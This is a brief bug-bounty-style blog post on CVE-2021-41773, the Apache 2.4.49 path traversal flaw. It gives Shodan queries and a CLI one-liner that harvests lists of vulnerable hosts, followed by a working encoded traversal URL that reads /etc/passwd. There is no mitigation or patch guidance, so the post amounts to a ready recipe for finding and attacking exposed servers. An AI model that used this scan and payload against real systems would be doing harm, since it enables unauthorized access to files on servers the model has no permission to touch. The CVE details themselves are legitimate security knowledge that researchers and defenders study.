Apache 0 Day !!

th3.d1p4k
Oct 6, 2021

Hello Hunters! Today’s topic is about CVE 2021–41773. Without further delay let’s get start.

Description:

A vulnerability has been found in Apache HTTP Server 2.4.49 and classified as critical. This vulnerability affects an unknown code of the component Path Normalization. The manipulation with an unknown input lead to a Local File Inclusion. The CWE definition for the vulnerability is CWE-22. As an impact it is known to affect confidentiality, CVE-2021–41773 has been exploited in the wild as a zero-day.

Recon:

Shodan:

  • Search Query 1: Apache 2.4.49
  • Search Query 2: Server: Apache/2.4.49

Shodan CLI:

shodan search “Apache 2.4.49” --fields ip_str,port --separator “ “ | awk ‘{print $1”:”$2}’ | tee -a apache0day.txt

Exploitation:

target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Template: Link

Instagram: th3.d1p4k

Twitter: Dipak Panchal

--

--